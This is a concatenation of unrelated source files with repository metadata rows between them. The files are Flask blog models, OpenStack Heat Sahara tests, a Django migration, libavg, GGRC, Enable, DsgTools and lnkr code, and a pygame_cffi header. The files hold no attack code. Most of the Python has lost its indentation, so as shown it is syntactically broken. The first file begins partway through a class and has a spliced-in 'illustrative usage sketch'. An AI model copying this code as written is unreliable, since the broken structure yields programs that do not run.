    # unfollow a user
def unfollow(self, user):
follower =self.followed.filter_by(followed_id=user.id).first()
if follower:
db.session.delete(follower)
    # query the followed relationship: it returns every (follower, followed) pair in which the current user is the follower
def is_following(self, user):
return self.followed.filter_by(followed_id=user.id).first() is not None
def is_followed_by(self, user):
return self.followers.filter_by(follower_id=user.id).first() is not None
    # get the posts of followed users
@property
def followed_posts(self):
return Post.query.join(Follow, Follow.followed_id==Post.author_id).filter(
Follow.follower_id==self.id)
    # built-in Python decorator that turns a method into a property access
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
    # user avatars provided by Gravatar
def gravatar(self, size):
return 'http://www.gravatar.com/avatar/' + md5(self.email.encode('utf-8')).hexdigest() + '?d=mm&s=' + str(size)
    # support token-based authentication
def generate_auth_token(self, expiration):
        s = Serializer(current_app.config['SECRET_KEY'], expires_in=expiration)
return s.dumps({'id': self.id})
@staticmethod
def verify_auth_token(token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except:
return None
return User.query.get(data['id'])
    # serialize the user into a JSON-ready dictionary
    # the content exposed to clients does not have to match the internal database model exactly
def to_json(self):
json_user = {
'url': url_for('api.get_user', id=self.id, _external=True),
'nickname': self.nickname,
'last_seen': self.last_seen,
'posts': url_for('api.get_user_posts', id=self.id, _external=True),
'followed_posts': url_for('api.get_user_followed_posts', id=self.id, _external=True),
'post_count': self.posts.count()
}
return json_user
def __repr__(self):
return '<User %r>' % (self.nickname)
@lm.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
default = db.Column(db.Boolean, default=False, index=True)
permissions = db.Column(db.Integer)
users = db.relationship('User', backref = 'role', lazy='dynamic')
@staticmethod
def insert_roles():
roles = {
'User': (Permission.FOLLOW |
Permission.COMMENT |
Permission.WRITE_ARTICLES, True),
'Moderator': (Permission.FOLLOW |
Permission.COMMENT |
Permission.WRITE_ARTICLES |
Permission.MODERATE_COMMENTS, False),
'Administrator': (0xff, False)
}
for r in roles:
role = Role.query.filter_by(name=r).first()
if role is None:
role = Role(name=r)
role.permissions = roles[r][0]
role.default = roles[r][1]
db.session.add(role)
db.session.commit()
def __repr__(self):
return '<Role %r>' % (self.name)
class Permission:
FOLLOW = 0x01
COMMENT = 0x02
WRITE_ARTICLES = 0x04
MODERATE_COMMENTS = 0x08
ADMINISTER = 0x80
@whooshee.register_model('title','body')
class Post(db.Model):
__tablename__ = 'posts'
# __searchable__ = ['body']
id = db.Column(db.Integer, primary_key = True)
title = db.Column(db.String(64))
body = db.Column(db.Text)
disabled = db.Column(db.Boolean)
view_num = db.Column(db.Integer, default=0)
body_html = db.Column(db.Text)
draft = db.Column(db.Boolean, default=False)
# outline = db.Column(db.String(250))
# like_num = db.Column(db.Integer, default=0)
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow)
author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
like_num = db.relationship('Like', backref='post', lazy='dynamic')
comments = db.relationship('Comment', backref='post', lazy='dynamic')
# reply_comments = db.relationship('Reply', backref='post', lazy='dynamic')
@staticmethod
def preview_body(target, value, oldvalue, initiator):
allowed_tags = [
'a', 'abbr', 'acronym', 'b', 'img', 'blockquote', 'code',
'em', 'i', 'li', 'ol', 'pre', 'strong', 'ul', 'h1', 'h2',
'h3', 'p'
]
target.body_html = bleach.linkify(bleach.clean(
markdown(value, output_format='html'),
tags=allowed_tags, strip=True,
attributes={
'*': ['class'],
'a': ['href', 'rel'],
                'img': ['src', 'alt'],  # allowed tags and attributes
}
))
    # serialize the post into a JSON-ready dictionary
def to_json(self):
json_post = {
'url': url_for('api.get_post', id=self.id, _external=True),
'title': self.title,
'body': self.body,
'body_html': self.body_html,
'timestamp': self.timestamp,
'author': url_for('api.get_user', id=self.author_id, _external=True),
'comments': url_for('api.get_post_comments', id=self.id, _external=True),
'comment_count': self.comments.count()
}
return json_post
@staticmethod
def from_json(json_post):
body = json_post.get('body')
title = json_post.get('title')
if body is None or body == '':
raise ValidationError('post does not have a body')
if title is None or title == '':
raise ValidationError('post does not have a title')
return Post(body=body,title=title)
def __repr__(self):
return '<Post %r>' % (self.body)
db.event.listen(Post.body, 'set', Post.preview_body)
# class that handles permission checks for users who are not logged in
class AnonymousUser(AnonymousUserMixin):
def operation(self, permissions):
return False
def is_administrator(self):
return False
lm.anonymous_user = AnonymousUser
# likes
class Like(db.Model):
__tablename__ = 'likes'
id = db.Column(db.Integer, primary_key=True)
unread = db.Column(db.Boolean, default=True)
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow())
liker_id = db.Column(db.Integer, db.ForeignKey('users.id'))
post_id = db.Column(db.Integer, db.ForeignKey('posts.id'))
class Comment(db.Model):
__tablename__ = 'comments'
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.Text)
body_html = db.Column(db.Text)
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow())
disabled = db.Column(db.Boolean)
comment_type = db.Column(db.String(64), default='comment')
reply_to = db.Column(db.String(128), default='notReply')
unread = db.Column(db.Boolean)
author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
post_id = db.Column(db.Integer, db.ForeignKey('posts.id'))
@staticmethod
def on_changed_body(target, value, oldvalue, initiator):
allowed_tags = [
'a', 'abbr', 'acronym', 'b', 'code', 'em', 'img', 'i', 'strong'
]
target.body_html = bleach.linkify(bleach.clean(
markdown(value, output_format='html'),
tags=allowed_tags, strip=True
))
db.event.listen(Comment.body, 'set', Comment.on_changed_body)
# conversations
class Conversation(db.Model):
__tablename__ = 'conversations'
id = db.Column(db.Integer, primary_key=True)
from_user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
to_user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
letter = db.Column(db.String(255))
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow())
unread = db.Column(db.Boolean, default=True)
to_user = db.relationship('User', lazy='joined', foreign_keys=[to_user_id])
from_user = db.relationship('User', lazy='joined', foreign_keys=[from_user_id])
# administration
class Admin(db.Model):
__tablename__ = 'admin'
id = db.Column(db.Integer, primary_key=True)
notice = db.Column(db.String(25))
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow())
def __repr__(self):
return '<Admin %r>' % (self.notice)
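# --- Illustrative usage sketch (added for documentation; not part of the original
# models). It exercises the roles and permission bit flags described in the module
# docstring; the e-mail/nickname/password values are placeholders and the function
# has to be called inside a Flask application context (for example from a shell).
def _permission_demo():
    """Create the default roles and check the permission bits of a fresh user."""
    Role.insert_roles()  # creates the User / Moderator / Administrator roles
    user = User(email='[email protected]', nickname='demo', password='secret')
    db.session.add(user)
    db.session.commit()
    # The default 'User' role is 0x07 = FOLLOW | COMMENT | WRITE_ARTICLES.
    assert user.operation(Permission.WRITE_ARTICLES)
    assert not user.operation(Permission.MODERATE_COMMENTS)
    assert not user.is_administrator()
    return user.role.name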
| mit | 6,585,300,988,462,585,000 | 35.289973 | 119 | 0.631917 | false |
maestro-hybrid-cloud/heat | heat/tests/test_sahara_templates.py | 1 | 14859 | # Copyright (c) 2014 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import six
from heat.common import exception
from heat.common import template_format
from heat.engine.clients.os import neutron
from heat.engine.clients.os import nova
from heat.engine.clients.os import sahara
from heat.engine.resources.openstack.sahara import sahara_templates as st
from heat.engine import scheduler
from heat.tests import common
from heat.tests import utils
node_group_template = """
heat_template_version: 2013-05-23
description: Sahara Node Group Template
resources:
node-group:
type: OS::Sahara::NodeGroupTemplate
properties:
name: node-group-template
plugin_name: vanilla
hadoop_version: 2.3.0
flavor: m1.large
volume_type: lvm
floating_ip_pool: some_pool_name
node_processes:
- namenode
- jobtracker
is_proxy_gateway: True
"""
cluster_template = """
heat_template_version: 2013-05-23
description: Sahara Cluster Template
resources:
cluster-template:
type: OS::Sahara::ClusterTemplate
properties:
name: test-cluster-template
plugin_name: vanilla
hadoop_version: 2.3.0
neutron_management_network: some_network
"""
cluster_template_without_name = """
heat_template_version: 2013-05-23
resources:
cluster_template!:
type: OS::Sahara::ClusterTemplate
properties:
plugin_name: vanilla
hadoop_version: 2.3.0
neutron_management_network: some_network
"""
node_group_template_without_name = """
heat_template_version: 2013-05-23
resources:
node_group!:
type: OS::Sahara::NodeGroupTemplate
properties:
plugin_name: vanilla
hadoop_version: 2.3.0
flavor: m1.large
floating_ip_pool: some_pool_name
node_processes:
- namenode
- jobtracker
"""
class FakeNodeGroupTemplate(object):
def __init__(self):
self.id = "some_ng_id"
self.name = "test-cluster-template"
self.to_dict = lambda: {"ng-template": "info"}
class FakeClusterTemplate(object):
def __init__(self):
self.id = "some_ct_id"
self.name = "node-group-template"
self.to_dict = lambda: {"cluster-template": "info"}
class SaharaNodeGroupTemplateTest(common.HeatTestCase):
def setUp(self):
super(SaharaNodeGroupTemplateTest, self).setUp()
self.stub_FlavorConstraint_validate()
self.stub_SaharaPluginConstraint()
self.stub_VolumeTypeConstraint_validate()
self.patchobject(nova.NovaClientPlugin, 'get_flavor_id'
).return_value = 'someflavorid'
self.patchobject(neutron.NeutronClientPlugin, '_create')
self.patchobject(neutron.NeutronClientPlugin, 'find_neutron_resource'
).return_value = 'some_pool_id'
sahara_mock = mock.MagicMock()
self.ngt_mgr = sahara_mock.node_group_templates
self.plugin_mgr = sahara_mock.plugins
self.patchobject(sahara.SaharaClientPlugin,
'_create').return_value = sahara_mock
self.patchobject(sahara.SaharaClientPlugin, 'validate_hadoop_version'
).return_value = None
self.fake_ngt = FakeNodeGroupTemplate()
self.t = template_format.parse(node_group_template)
def _init_ngt(self, template):
self.stack = utils.parse_stack(template)
return self.stack['node-group']
def test_ngt_resource_mapping(self):
ngt = self._init_ngt(self.t)
mapping = st.resource_mapping()
self.assertEqual(st.SaharaNodeGroupTemplate,
mapping['OS::Sahara::NodeGroupTemplate'])
self.assertIsInstance(ngt,
st.SaharaNodeGroupTemplate)
def _create_ngt(self, template):
ngt = self._init_ngt(template)
self.ngt_mgr.create.return_value = self.fake_ngt
scheduler.TaskRunner(ngt.create)()
self.assertEqual((ngt.CREATE, ngt.COMPLETE), ngt.state)
self.assertEqual(self.fake_ngt.id, ngt.resource_id)
return ngt
def test_ngt_create(self):
self._create_ngt(self.t)
args = {
'name': 'node-group-template',
'plugin_name': 'vanilla',
'hadoop_version': '2.3.0',
'flavor_id': 'someflavorid',
'description': "",
'volumes_per_node': None,
'volumes_size': None,
'volume_type': 'lvm',
'security_groups': None,
'auto_security_group': None,
'availability_zone': None,
'volumes_availability_zone': None,
'node_processes': ['namenode', 'jobtracker'],
'floating_ip_pool': 'some_pool_id',
'node_configs': None,
'image_id': None,
'is_proxy_gateway': True,
'volume_local_to_instance': None,
'use_autoconfig': None
}
self.ngt_mgr.create.assert_called_once_with(**args)
def test_validate_floatingippool_on_neutron_fails(self):
ngt = self._init_ngt(self.t)
self.patchobject(ngt, 'is_using_neutron').return_value = True
self.patchobject(
neutron.NeutronClientPlugin, 'find_neutron_resource'
).side_effect = [
neutron.exceptions.NeutronClientNoUniqueMatch(message='Too many'),
neutron.exceptions.NeutronClientException(message='Not found',
status_code=404)
]
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual('Too many',
six.text_type(ex))
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual('Not found',
six.text_type(ex))
def test_validate_floatingippool_on_novanetwork_fails(self):
ngt = self._init_ngt(self.t)
self.patchobject(ngt, 'is_using_neutron').return_value = False
nova_mock = mock.MagicMock()
nova_mock.floating_ip_pools.find.side_effect = (
nova.exceptions.NotFound(404, message='Not found'))
self.patchobject(nova.NovaClientPlugin,
'_create').return_value = nova_mock
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual('Not found', six.text_type(ex))
def test_validate_flavor_constraint_return_false(self):
self.t['resources']['node-group']['properties'].pop('floating_ip_pool')
self.t['resources']['node-group']['properties'].pop('volume_type')
ngt = self._init_ngt(self.t)
self.patchobject(nova.FlavorConstraint, 'validate'
).return_value = False
self.patchobject(ngt, 'is_using_neutron').return_value = False
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual(u"Property error: "
u"resources.node-group.properties.flavor: "
u"Error validating value 'm1.large'",
six.text_type(ex))
def test_template_invalid_name(self):
tmpl = template_format.parse(node_group_template_without_name)
stack = utils.parse_stack(tmpl)
ngt = stack['node_group!']
self.ngt_mgr.create.return_value = self.fake_ngt
scheduler.TaskRunner(ngt.create)()
self.assertEqual((ngt.CREATE, ngt.COMPLETE), ngt.state)
self.assertEqual(self.fake_ngt.id, ngt.resource_id)
name = self.ngt_mgr.create.call_args[1]['name']
self.assertIn('-nodegroup-', name)
def test_ngt_show_resource(self):
ngt = self._create_ngt(self.t)
self.ngt_mgr.get.return_value = self.fake_ngt
self.assertEqual({"ng-template": "info"}, ngt.FnGetAtt('show'))
self.ngt_mgr.get.assert_called_once_with('some_ng_id')
def test_validate_node_processes_fails(self):
ngt = self._init_ngt(self.t)
plugin_mock = mock.MagicMock()
plugin_mock.node_processes = {
"HDFS": ["namenode", "datanode", "secondarynamenode"],
"JobFlow": ["oozie"]
}
self.plugin_mgr.get_version_details.return_value = plugin_mock
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertIn("resources.node-group.properties: Plugin vanilla "
"doesn't support the following node processes: "
"jobtracker. Allowed processes are: ",
six.text_type(ex))
self.assertIn("namenode", six.text_type(ex))
self.assertIn("datanode", six.text_type(ex))
self.assertIn("secondarynamenode", six.text_type(ex))
self.assertIn("oozie", six.text_type(ex))
def test_update(self):
ngt = self._create_ngt(self.t)
rsrc_defn = self.stack.t.resource_definitions(self.stack)['node-group']
rsrc_defn['Properties']['node_processes'] = [
'tasktracker', 'datanode']
scheduler.TaskRunner(ngt.update, rsrc_defn)()
args = {
'name': 'node-group-template',
'plugin_name': 'vanilla',
'hadoop_version': '2.3.0',
'flavor_id': 'someflavorid',
'description': "",
'volumes_per_node': None,
'volumes_size': None,
'volume_type': 'lvm',
'security_groups': None,
'auto_security_group': None,
'availability_zone': None,
'volumes_availability_zone': None,
'node_processes': ['tasktracker', 'datanode'],
'floating_ip_pool': 'some_pool_id',
'node_configs': None,
'image_id': None,
'is_proxy_gateway': True,
'volume_local_to_instance': None,
'use_autoconfig': None
}
self.ngt_mgr.update.assert_called_once_with('some_ng_id', **args)
self.assertEqual((ngt.UPDATE, ngt.COMPLETE), ngt.state)
class SaharaClusterTemplateTest(common.HeatTestCase):
def setUp(self):
super(SaharaClusterTemplateTest, self).setUp()
self.patchobject(st.constraints.CustomConstraint, '_is_valid'
).return_value = True
self.patchobject(neutron.NeutronClientPlugin, '_create')
self.patchobject(neutron.NeutronClientPlugin, 'find_neutron_resource'
).return_value = 'some_network_id'
sahara_mock = mock.MagicMock()
self.ct_mgr = sahara_mock.cluster_templates
self.patchobject(sahara.SaharaClientPlugin,
'_create').return_value = sahara_mock
self.patchobject(sahara.SaharaClientPlugin, 'validate_hadoop_version'
).return_value = None
self.fake_ct = FakeClusterTemplate()
self.t = template_format.parse(cluster_template)
def _init_ct(self, template):
self.stack = utils.parse_stack(template)
return self.stack['cluster-template']
def test_ct_resource_mapping(self):
ct = self._init_ct(self.t)
mapping = st.resource_mapping()
self.assertEqual(st.SaharaClusterTemplate,
mapping['OS::Sahara::ClusterTemplate'])
self.assertIsInstance(ct,
st.SaharaClusterTemplate)
def _create_ct(self, template):
ct = self._init_ct(template)
self.ct_mgr.create.return_value = self.fake_ct
scheduler.TaskRunner(ct.create)()
self.assertEqual((ct.CREATE, ct.COMPLETE), ct.state)
self.assertEqual(self.fake_ct.id, ct.resource_id)
return ct
def test_ct_create(self):
self._create_ct(self.t)
args = {
'name': 'test-cluster-template',
'plugin_name': 'vanilla',
'hadoop_version': '2.3.0',
'description': '',
'default_image_id': None,
'net_id': 'some_network_id',
'anti_affinity': None,
'node_groups': None,
'cluster_configs': None,
'use_autoconfig': None
}
self.ct_mgr.create.assert_called_once_with(**args)
def test_ct_validate_no_network_on_neutron_fails(self):
self.t['resources']['cluster-template']['properties'].pop(
'neutron_management_network')
ct = self._init_ct(self.t)
self.patchobject(ct, 'is_using_neutron', return_value=True)
ex = self.assertRaises(exception.StackValidationFailed,
ct.validate)
self.assertEqual("neutron_management_network must be provided",
six.text_type(ex))
def test_template_invalid_name(self):
tmpl = template_format.parse(cluster_template_without_name)
stack = utils.parse_stack(tmpl)
ct = stack['cluster_template!']
self.ct_mgr.create.return_value = self.fake_ct
scheduler.TaskRunner(ct.create)()
self.assertEqual((ct.CREATE, ct.COMPLETE), ct.state)
self.assertEqual(self.fake_ct.id, ct.resource_id)
name = self.ct_mgr.create.call_args[1]['name']
self.assertIn('-clustertemplate-', name)
def test_ct_show_resource(self):
ct = self._create_ct(self.t)
self.ct_mgr.get.return_value = self.fake_ct
self.assertEqual({"cluster-template": "info"}, ct.FnGetAtt('show'))
self.ct_mgr.get.assert_called_once_with('some_ct_id')
def test_update(self):
ct = self._create_ct(self.t)
rsrc_defn = self.stack.t.resource_definitions(self.stack)[
'cluster-template']
rsrc_defn['Properties']['plugin_name'] = 'hdp'
rsrc_defn['Properties']['hadoop_version'] = '1.3.2'
scheduler.TaskRunner(ct.update, rsrc_defn)()
args = {
'name': 'test-cluster-template',
'plugin_name': 'hdp',
'hadoop_version': '1.3.2',
'description': '',
'default_image_id': None,
'net_id': 'some_network_id',
'anti_affinity': None,
'node_groups': None,
'cluster_configs': None,
'use_autoconfig': None
}
self.ct_mgr.update.assert_called_once_with('some_ct_id', **args)
self.assertEqual((ct.UPDATE, ct.COMPLETE), ct.state)
| apache-2.0 | -4,499,161,583,605,528,000 | 38.205805 | 79 | 0.605761 | false |
dumel93/project- | type_page/migrations/0002_auto_20170711_1101.py | 1 | 1481 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-07-11 11:01
from __future__ import unicode_literals
import django.contrib.auth.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('type_page', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='FootballType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_team', models.CharField(max_length=64, null=True)),
('second_team', models.CharField(max_length=64, null=True)),
('draw', models.BooleanField(default=True)),
('date_game', models.DateTimeField()),
('league', models.CharField(max_length=64)),
('course', models.IntegerField()),
('bet', models.IntegerField()),
],
options={
'ordering': ['date_game'],
},
),
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.ASCIIUsernameValidator()], verbose_name='username'),
),
]
| mit | -2,548,361,275,656,014,000 | 39.027027 | 315 | 0.576637 | false |
lynxis/libavg | src/python/avgapp.py | 1 | 4330 | # libavg - Media Playback Engine.
# Copyright (C) 2003-2011 Ulrich von Zadow
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Current versions can be found at www.libavg.de
#
# Original author of this file is Martin Heistermann <mh at sponc dot de>
#
from appstarter import AppStarter
class AVGApp(object):
_instances = {}
multitouch = False
fakeFullscreen = False
def __init__(self, parentNode):
'''
Initialization before Player.play()
Use this only when needed, e.g. for
WordsNode.addFontDir(). Do not forget to call
super(YourApp, self).__init__(parentNode)
'''
import warnings
warnings.warn('AVGApp is deprecated, use libavg.app.App instead')
appname = self.__class__.__name__
if appname in AVGApp._instances:
raise RuntimeError('App %s already setup' % appname)
AVGApp._instances[appname] = self
self.__isRunning = False
self._parentNode = parentNode
self._starter = None
if 'onKey' in dir(self):
raise DeprecationWarning, \
'AVGApp.onKey() has been renamed to AVGApp.onKeyDown().'
@classmethod
def get(cls):
'''
Get the Application instance
Note: this class method has to be called from the top-level app class:
>>> class MyApp(libavg.AVGApp):
... pass
>>> instance = MyApp.get()
'''
return cls._instances.get(cls.__name__, None)
@classmethod
def start(cls, **kwargs):
if cls.multitouch:
from appstarter import AVGMTAppStarter
starter = AVGMTAppStarter
else:
from appstarter import AVGAppStarter
starter = AVGAppStarter
starter(appClass=cls, fakeFullscreen=cls.fakeFullscreen, **kwargs)
def init(self):
"""main initialization
build node hierarchy under self.__parentNode."""
pass
def exit(self):
"""Deinitialization
Called after player.play() returns. End of program run."""
pass
def _enter(self):
"""enter the application, internal interface.
override this and start all animations, intervals
etc. here"""
pass
def _leave(self):
"""leave the application, internal interface.
override this and stop all animations, intervals
etc. Take care your application does not use any
non-needed resources after this."""
pass
def enter(self, onLeave = lambda: None):
"""enter the application, external interface.
Do not override this."""
self.__isRunning = True
self._onLeave = onLeave
self._enter()
def leave(self):
"""leave the application, external interface.
Do not override this."""
self.__isRunning = False
self._onLeave()
self._leave()
def onKeyDown(self, event):
"""returns bool indicating if the event was handled
by the application """
return False
def onKeyUp(self, event):
"""returns bool indicating if the event was handled
by the application """
return False
def isRunning(self):
return self.__isRunning
def setStarter(self, starter):
self._starter = starter
def getStarter(self):
return self._starter
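# Illustrative sketch (added for documentation; not part of the original module):
# a minimal AVGApp subclass showing where the init/_enter/_leave hooks fit in.
# The actual node setup is omitted because it depends on the application.
class _ExampleApp(AVGApp):
    multitouch = False
    def init(self):
        # Build the node hierarchy under self._parentNode here.
        pass
    def _enter(self):
        # Start animations, intervals and sounds here.
        pass
    def _leave(self):
        # Stop everything that _enter() started.
        pass
    def onKeyDown(self, event):
        # Return True if the application handled the key event.
        return False
# Such an app would normally be launched with something like:
#   _ExampleApp.start(resolution=(640, 480))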
class App(object):
@classmethod
def start(cls, *args, **kargs):
raise RuntimeError('avgapp.App cannot be used any longer. Use libavg.AVGApp for '
'a compatible class or switch to the new libavg.app.App')
| lgpl-2.1 | -1,709,239,406,444,618,200 | 29.492958 | 89 | 0.627483 | false |
plamut/ggrc-core | test/selenium/src/lib/utils/string_utils.py | 1 | 1860 | # Copyright (C) 2017 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Utility functions for string operations."""
import random
import string
import uuid
BLANK = ''
COMMA = ',' # comma is used as delimiter for multi-choice values
LESS = '<' # need exclude this character due to issue GGRC-527
DOUBLE_QUOTES = '"' # need exclude this character due to issue GGRC-931
BACKSLASH = '\\' # need exclude this character due to issue GGRC-931
EXCLUDE = COMMA + LESS + DOUBLE_QUOTES + BACKSLASH
SPECIAL = BLANK.join(_ for _ in string.punctuation if _ not in EXCLUDE)
def random_string(size=5, chars=string.letters + string.digits + SPECIAL):
"""Return string with corresponding size that filled by values from selected
chars.
"""
return BLANK.join(random.choice(chars) for position in range(size))
def random_uuid(length=13):
"""Return string with predefined length base on UUID."""
return str(uuid.uuid4())[:length]
def random_list_strings(list_len=3, item_size=5,
chars=string.letters + string.digits + SPECIAL):
"""Return list of random strings separated by comma."""
return COMMA.join(random_string(item_size, chars) for i in range(list_len))
def get_bool_from_string(str_to_bool):
"""Return True for 'Yes' and False for 'No'."""
if str_to_bool.title() == 'Yes':
return True
elif str_to_bool.title() == 'No':
return False
else:
raise ValueError("'{}' can't be converted to boolean".format(str_to_bool))
def remap_keys_for_list_dicts(dict_transformation_keys, list_dicts):
"""Remap keys names for old list of dictionaries according
transformation dictionary {OLD KEY: NEW KEY} and return new updated
list of dictionaries.
"""
return [{dict_transformation_keys[key]: value for key, value
in dic.iteritems()} for dic in list_dicts]
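# Illustrative usage sketch (added for documentation; not part of the original
# module); the literal keys and values below are placeholders.
def _usage_example():
  """Show the expected behaviour of the helpers above; call manually if needed."""
  assert len(random_string(size=8)) == 8
  assert get_bool_from_string('yes') is True
  assert get_bool_from_string('No') is False
  remapped = remap_keys_for_list_dicts({'old': 'new'}, [{'old': 1}, {'old': 2}])
  assert remapped == [{'new': 1}, {'new': 2}]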
| apache-2.0 | -5,070,785,767,555,766,000 | 34.769231 | 78 | 0.703763 | false |
tommy-u/enable | examples/enable/component_demo.py | 1 | 1333 | """
Basic demo of drawing within an Enable component.
"""
from enable.api import Component, ComponentEditor
from traits.api import HasTraits, Instance
from traitsui.api import Item, View
class MyComponent(Component):
def draw(self, gc, **kwargs):
        w, h = gc.width(), gc.height()
gc.clear()
# Draw a rounded rect just inside the bounds
gc.set_line_width(2.0)
gc.set_stroke_color((0.0, 0.0, 0.0, 1.0))
r = 15
b = 3
gc.move_to(b, h/2)
gc.arc_to(b, h-b,
w/2, h-b,
r)
gc.arc_to(w-b, h-b,
w-b, h/2,
r)
gc.arc_to(w-b, b,
w/2, b,
r)
gc.arc_to(b, b,
b, h/2,
r)
gc.line_to(b, h/2)
gc.stroke_path()
return
def normal_key_pressed(self, event):
print "key pressed: ", event.character
class Demo(HasTraits):
canvas = Instance(Component)
traits_view = View(Item('canvas', editor=ComponentEditor(),
show_label=False, width=200, height=200),
resizable=True, title="Component Example")
def _canvas_default(self):
return MyComponent()
if __name__ == "__main__":
Demo().configure_traits()
| bsd-3-clause | 8,483,525,954,035,567,000 | 24.150943 | 69 | 0.501875 | false |
lcoandrade/DsgTools | tests/test_OtherAlgorithms.py | 1 | 2763 | # -*- coding: utf-8 -*-
"""
/***************************************************************************
DsgTools
A QGIS plugin
Brazilian Army Cartographic Production Tools
-------------------
begin : 2019-07-04
git sha : $Format:%H$
copyright : (C) 2019 by João P. Esperidião - Cartographic Engineer @ Brazilian Army
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
"""
Script designed to test each validation algorithm from DSGTools 4.X.
It is supposed to be run through QGIS with DSGTools installed.
* This is merely a prototype for our unit test suite. *
"""
import os
import sys
import warnings
import yaml
import shutil
from osgeo import ogr
import processing
from qgis.utils import iface
from qgis.core import QgsDataSourceUri, QgsVectorLayer, QgsProcessingFeedback,\
QgsProcessingContext, QgsLayerTreeLayer, QgsProject
from qgis.PyQt.QtSql import QSqlDatabase
from DsgTools.core.dsgEnums import DsgEnums
from DsgTools.core.Factories.DbFactory.dbFactory import DbFactory
from DsgTools.core.Factories.LayerLoaderFactory.layerLoaderFactory import LayerLoaderFactory
from qgis.testing import unittest
from DsgTools.tests.algorithmsTestBase import AlgorithmsTest, GenericAlgorithmsTest
class Tester(GenericAlgorithmsTest, AlgorithmsTest):
@classmethod
def setUpClass(cls):
cls.cleanup_paths = []
@classmethod
def tearDownClass(cls):
QgsProject.instance().clear()
for path in cls.cleanup_paths:
shutil.rmtree(path)
def get_definition_file(self):
return 'otherAlgorithms.yaml'
def run_all(filterString=None):
"""Default function that is called by the runner if nothing else is specified"""
filterString = 'test_' if filterString is None else filterString
suite = unittest.TestSuite()
suite.addTests(unittest.makeSuite(Tester, filterString))
unittest.TextTestRunner(verbosity=3, stream=sys.stdout).run(suite)
| gpl-2.0 | 1,559,963,913,760,249,000 | 38.442857 | 102 | 0.56791 | false |
yjpark/lnkr | lnkr/app_config.py | 1 | 1375 | import os
import lnkr
import term
from toml_config import TomlConfig
from import_section import ImportSection, new_import_section
class AppConfig(TomlConfig):
def __init__(self, path):
if not hasattr(self, 'kind'):
self.kind = "App"
self.attribs = {}
self.import_sections = []
TomlConfig.__init__(self, path)
def parse(self):
term.verbose('\nParse %s Config: %s' % (self.kind, term.format_path(self.path)))
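        # Dict-valued entries describe import sections; scalar entries are
        # kept as plain attributes of this config object.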
for key in self.values:
value = self.values[key]
if isinstance(value, dict):
import_section = new_import_section(self.root_path, key, value)
if import_section is not None:
self.import_sections.append(import_section)
else:
self.attribs[key] = value
for key in self.attribs:
term.verbose('Parse %s Config Attrib: %s = %s' % (self.kind, term.format_path(key), term.format_param(self.attribs[key])))
for section in self.import_sections:
term.verbose('Parse %s Config Import Section: %s' % (self.kind, term.format_param(section.__str__())))
return len(self.import_sections) > 0
def get_import_section(self, key):
for section in self.import_sections:
if section.key == key:
return section
return None
| mit | 8,578,927,095,839,543,000 | 36.162162 | 134 | 0.592 | false |
CTPUG/pygame_cffi | pygame/constants.py | 1 | 3624 | # pygame_cffi - a cffi implementation of the pygame library
# Copyright (C) 2013 Neil Muller
# Copyright (C) 2013 Jeremy Thurgood
# Copyright (C) 2013 Maciej Fijalkowski
# Copyright (C) 2014 Rizmari Versfeld
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
